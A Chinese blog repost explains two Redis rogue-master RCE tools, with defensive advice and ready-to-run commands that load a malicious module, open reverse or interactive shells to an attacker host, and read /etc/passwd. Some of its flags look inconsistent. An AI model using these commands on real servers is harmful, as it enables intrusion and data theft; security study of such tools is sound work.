工具介紹《Awsome-Redis-Rogue-Server 與 redis-rogue-server》

1. 核心功能與攻擊場景

  • redis-rogue-server
    基于Redis主從復制漏洞(CVE未公開),針對Redis 4.x~5.0.5版本設計,通過偽造惡意主節點強制同步惡意模塊(.so文件)實現遠程代碼執行(RCE)。

    • 適用場景
      • 主動模式:攻擊外網暴露的未授權Redis或已知弱密碼的實例,直接建立主從關系。
      • 被動模式:通過SSRF或內網橫向移動,誘導目標Redis反向連接攻擊者控制的惡意主節點。
    • 技術特點
      • 內置編譯好的惡意模塊(如exp.so),支持生成反彈Shell或執行系統命令。
      • 支持交互式Shell(直接命令執行)或反向Shell(繞過防火墻限制)。
  • Awsome-Redis-Rogue-Server
    在原版基礎上優化,支持更復雜的Redis認證場景(如存在密碼保護的實例),并修復部分兼容性問題。

    • 核心改進
      • 增加對密碼認證Redis實例的利用能力,通過--passwd參數指定密碼。
      • 優化模塊加載邏輯,減少因網絡波動導致的同步失敗。
    • 應用場景
      • 針對企業內網中配置了密碼但未限制主從復制的Redis實例。
      • 結合Redis橫向滲透工具(如RedisScanner)批量探測并攻擊。

2. 使用流程與工具差異

對比項redis-rogue-serverAwsome-Redis-Rogue-Server
依賴文件需預編譯.so模塊(或使用自帶exp.so同左,但優化模塊兼容性
密碼支持有限支持(需手動修改代碼或參數)原生支持--passwd參數指定密碼
攻擊模式主動/被動模式同左,增加對認證流程的自動化處理
適用Redis版本4.x-5.0.5擴展至部分5.0.5+版本(需測試)
典型命令python3 redis-rogue-server.py --rhost <目標IP>python3 redis_rogue_server.py -rhost <目標IP> -passwd <密碼>

3. 防御建議與漏洞修復

  • 禁用高危命令:通過rename-command重命名或禁用MODULESLAVEOF等指令。
  • 強制認證:設置requirepass強密碼,并啟用masterauth保證主從通信安全。
  • 網絡隔離:限制Redis端口僅對可信IP開放,避免暴露公網。
  • 升級修復:升級至Redis 7.4.2+/7.2.7+修復Lua引擎漏洞(如CVE-2024-46981)。

總結

兩者均利用Redis主從復制的設計缺陷實現RCE,但Awsome-Redis-Rogue-Server更適用于復雜認證環境,而redis-rogue-server更適合快速測試未授權場景。防御需結合訪問控制、日志監控與版本升級,避免惡意模塊加載和橫向滲透。


redis_rogue_server.py 參數解析

該文件位于Awsome-Redis-Rogue-Server項目中。

1. 基本參數
參數描述示例
-rhost目標Redis服務器的IP地址。-rhost 192.168.1.100
-rport目標Redis服務器的端口(默認6379)。-rport 6379
-lhost攻擊者主機的IP地址(用于反向Shell或模塊同步)。-lhost 10.0.0.1
-lport攻擊者主機的監聽端口(默認15000)。-lport 21000
-passwdRedis實例的認證密碼(若目標Redis設置了密碼)。-passwd redis123
-sofile指定惡意模塊文件(如exp.so)。-sofile ./exp.so
-path指定惡意模塊文件路徑(如 exp.so),該模塊通常包含遠程代碼執行函數(如 system.exec),程序到路徑中加載文件。-path exp.so
-v詳細輸出模式,用于顯示攻擊過程中的調試信息,如連接狀態、命令執行細節、模塊加載進度等。-v
2. 高級參數
參數描述示例
--command直接執行系統命令(無需加載模塊)。--command "id"
--function調用模塊中的特定函數(如system.exec)。--function system.exec
--backupfile指定目標Redis持久化文件的備份路徑(用于恢復數據)。--backupfile /tmp/dump.rdb
--interactive啟用交互式Shell(加載模塊后)。--interactive
3. 使用示例
# 主動模式(外網/已知密碼):加載 exp.so 模塊,獲取交互式 
# 功能:通過主從復制加載惡意模塊,直接進入交互式 Shell。
# 場景:外網 Redis 未授權或已知弱密碼。
Shell python3 redis_rogue_server.py -rhost 192.168.1.100 -lhost 10.0.0.1 -passwd redis123 -sofile exp.so --interactive# 被動模式(內網/SSRF誘導):僅啟動惡意主節點,等待目標 Redis 反向連接 
# 功能:通過 SSRF 或內網橫向移動誘導目標 Redis 連接惡意主節點。
# 場景:目標 Redis 處于內網且無法直接訪問。
python3 redis_rogue_server.py --server-only -lhost 10.0.0.1 -lport 21000# 反向 Shell 反彈:監聽 4444 端口,觸發目標反彈 Shell 
# 功能:利用模塊中的 `system.rev` 函數建立反向 Shell。
# 場景:繞過防火墻限制或權限維持。
python3 redis_rogue_server.py -rhost 192.168.1.100 -lhost 10.0.0.1 -lport 4444 -sofile exp.so --function system.rev# 快速命令執行:直接執行系統命令(無需加載模塊)
# 功能:快速驗證漏洞或執行單條命令。
# 場景:應急響應或自動化滲透測試。
python3 redis_rogue_server.py -rhost 192.168.1.100 -command "cat /etc/passwd"# 調用自定義模塊的特定函數:
# 說明:適用于繞過 WAF 或實現隱蔽攻擊。
python3 redis_rogue_server.py -rhost 192.168.1.100 -sofile custom.so --function custom_cmd --command "rm -f /tmp/lock"# 攻擊前備份目標 Redis 數據 
# 說明:避免攻擊導致業務中斷,需提前驗證備份文件完整性。
python3 redis_rogue_server.py -rhost 192.168.1.100 --backupfile /tmp/dump.rdb
4. 注意事項
  • 惡意模塊exp.so 需提前編譯,包含 system.exec 等函數。
  • 網絡權限:確保攻擊者主機(lhost)可被目標Redis訪問(用于反向Shell或模塊同步)。
  • 數據備份:攻擊前建議備份目標Redis數據(--backupfile),避免數據丟失。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/73687.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/73687.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/73687.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Razor C# 變量

Razor C# 變量 引言 在ASP.NET MVC和Razor視圖引擎中,變量是構建動態網頁的基礎。理解Razor C#變量的使用對于開發者來說至關重要。本文將詳細介紹Razor C#變量的概念、類型、作用域以及如何在實際項目中有效使用它們。 一、Razor C# 變量的概念 Razor C# 變量是存儲在Raz…

【QA】模板方法模式在Qt中有哪些應用?

在 Qt 框架中&#xff0c;模板方法模式&#xff08;Template Method Pattern&#xff09;被廣泛應用于框架的設計中&#xff0c;通過定義算法骨架并允許子類在不改變結構的情況下重寫部分步驟。以下是 Qt 中典型的應用場景及示例&#xff1a; 1. 事件處理&#xff08;Event Ha…

有趣的算法實踐:整數反轉與回文檢測(Java實現)

題目描述&#xff1a;整數反轉與回文檢測 要求實現兩個功能&#xff1a; 將輸入的整數反轉&#xff08;保留符號&#xff0c;如輸入-123返回-321&#xff09;判斷反轉后的數是否為回文數&#xff08;正反讀相同&#xff09; 示例&#xff1a; 輸入&#xff1a;123 → 反轉結…

【協作開發】低成本一鍵復刻github的gitea

在閱讀 next-public 時&#xff0c;反思原本的需求&#xff0c;是否本未倒置&#xff0c;故而重新調研當下開源現狀。發現 gitea 完全滿足商業軟件的開發要求&#xff0c;并且價格足夠低&#xff0c;使用足夠方便&#xff0c;其他同類軟件完全不用看了&#xff0c;真是世界級的…

基于“動手學強化學習”的知識點(二):第 15 章 模仿學習(gym版本 >= 0.26)

第 15 章 模仿學習&#xff08;gym版本 &#xff1e; 0.26&#xff09; 摘要 摘要 本系列知識點講解基于動手學強化學習中的內容進行詳細的疑難點分析&#xff01;具體內容請閱讀動手學強化學習&#xff01; 對應動手學強化學習——模仿學習 # -*- coding: utf-8 -*-import gy…

JAVA面試_進階部分_Java JVM:垃圾回收(GC 在什么時候,對什么東西,做了什么事情)

在什么時候&#xff1a; 首先需要知道&#xff0c;GC又分為minor GC 和 Full GC&#xff08;major GC&#xff09;。Java堆內存分為新生代和老年代&#xff0c;新生代 中又分為1個eden區和兩個Survior區域。 一般情況下&#xff0c;新創建的對象都會被分配到eden區&#xff…

2024年消費者權益數據分析

&#x1f4c5; 2024年315消費者權益數據分析 數據見&#xff1a;https://mp.weixin.qq.com/s/eV5GoionxhGpw7PunhOVnQ 一、引言 在數字化時代&#xff0c;消費者維權數據對于市場監管、商家誠信和行業發展具有重要價值。本文基于 2024年315平臺線上投訴數據&#xff0c;采用數…

設計模式Python版 訪問者模式

文章目錄 前言一、訪問者模式二、訪問者模式示例 前言 GOF設計模式分三大類&#xff1a; 創建型模式&#xff1a;關注對象的創建過程&#xff0c;包括單例模式、簡單工廠模式、工廠方法模式、抽象工廠模式、原型模式和建造者模式。結構型模式&#xff1a;關注類和對象之間的組…

安全無事故連續天數計算,python 時間工具的高效利用

安全天數計算&#xff0c;數據系統時間直取&#xff0c;安全標準高效便捷好用。 筆記模板由python腳本于2025-03-17 23:50:52創建&#xff0c;本篇筆記適合對python時間工具有研究欲的coder翻閱。 【學習的細節是歡悅的歷程】 博客的核心價值&#xff1a;在于輸出思考與經驗&am…

大型語言模型(LLM)部署中的內存消耗計算

在部署大型語言模型&#xff08;LLM&#xff09;時&#xff0c;顯存&#xff08;VRAM&#xff09;的合理規劃是決定模型能否高效運行的核心問題。本文將通過詳細的公式推導和示例計算&#xff0c;系統解析模型權重、鍵值緩存&#xff08;KV Cache&#xff09;、激活內存及額外開…

Mysql表的查詢

一&#xff1a;創建一個新的數據庫&#xff08;companydb),并查看數據庫。 二&#xff1a;使用該數據庫&#xff0c;并創建表worker。 mysql> use companydb;mysql> CREATE TABLE worker(-> 部門號 INT(11) NOT NULL,-> 職工號 INT(11) NOT NULL,-> 工作時間 D…

ASP.NET Webform和ASP.NET MVC 后臺開發 大概80%常用技術

本文涉及ASP.NET Webform和ASP.NET MVC 后臺開發大概80%技術 2019年以前對標 深圳22K左右 廣州18K左右 武漢16K左右 那么有人問了2019年以后的呢&#xff1f; 答&#xff1a;吉祥三寶。。。 So 想繼續看下文的 得有自己的獨立判斷能力。 C#.NET高級筆試題 架構 優化 性能提…

首頁性能優化

首頁性能提升是前端優化中的核心任務之一&#xff0c;因為首頁是用戶訪問的第一入口&#xff0c;其加載速度和交互體驗直接影響用戶的留存率和轉化率。 1. 性能瓶頸分析 在優化之前&#xff0c;首先需要通過工具分析首頁的性能瓶頸。常用的工具包括&#xff1a; Chrome DevTo…

一周學會Flask3 Python Web開發-SQLAlchemy刪除數據操作-班級模塊

鋒哥原創的Flask3 Python Web開發 Flask3視頻教程&#xff1a; 2025版 Flask3 Python web開發 視頻教程(無廢話版) 玩命更新中~_嗶哩嗶哩_bilibili 首頁list.html里加上刪除鏈接&#xff1a; <!DOCTYPE html> <html lang"en"> <head><meta c…

改變一生的思維模型【12】笛卡爾思維模型

目錄 基本結構 警惕認知暗礁 案例分析應用 一、懷疑階段:破除慣性認知 二、解析階段:拆解問題為最小單元 三、整合階段:重構邏輯鏈條 四、檢驗階段:多維驗證解決方案 總結與啟示 笛卡爾說,唯獨自己的思考是可以相信的。 世界上所有的事情,都是值得被懷疑的,但是…

需求文檔(PRD,Product Requirement Document)的基本要求和案例參考:功能清單、流程圖、原型圖、邏輯能力和表達能力

文章目錄 引言I 需求文檔的基本要求結構清晰內容完整語言準確圖文結合版本管理II 需求文檔案例參考案例1:電商平臺“商品中心”功能需求(簡化版)案例2:教育類APP“記憶寶盒”非功能需求**案例3:軟件項目的功能需求模板3.1 功能需求III 需求文檔撰寫技巧1. **從核心邏輯出發…

五大方向全面對比 IoTDB 與 OpenTSDB

對比系列第三彈&#xff0c;詳解 IoTDB VS OpenTSDB&#xff01; 之前&#xff0c;我們已經深入探討了時序數據庫 Apache IoTDB 與 InfluxDB、Apache HBase 在架構設計、性能和功能方面等多個維度的區別。還沒看過的小伙伴可以點擊閱讀&#xff1a; Apache IoTDB vs InfluxDB 開…

Electron使用WebAssembly實現CRC-16 MAXIM校驗

Electron使用WebAssembly實現CRC-16 MAXIM校驗 將C/C語言代碼&#xff0c;經由WebAssembly編譯為庫函數&#xff0c;可以在JS語言環境進行調用。這里介紹在Electron工具環境使用WebAssembly調用CRC-16 MAXIM格式校驗的方式。 CRC-16 MAXIM校驗函數WebAssembly源文件 C語言實…

vue3vue-elementPlus-admin框架中form組件的upload寫法

dialog中write組件代碼 let ImageList reactive<UploadFile[]>([])const formSchema reactive<FormSchema[]>([{field: ImageFiles,label: 現場圖片,component: Upload,colProps: { span: 24 },componentProps: {limit: 5,action: PATH_URL /upload,headers: {…

Linux mount和SSD分區

為什么要用 mount&#xff1f; Linux 的文件系統結構是單一的樹狀層次 所有文件、目錄和設備都從根目錄 / 開始延伸。 外部的存儲設備&#xff08;如硬盤、U盤、網絡存儲&#xff09;或虛擬文件系統&#xff08;如 /proc、/sys&#xff09;必須通過掛載點“嫁接”到這棵樹上&a…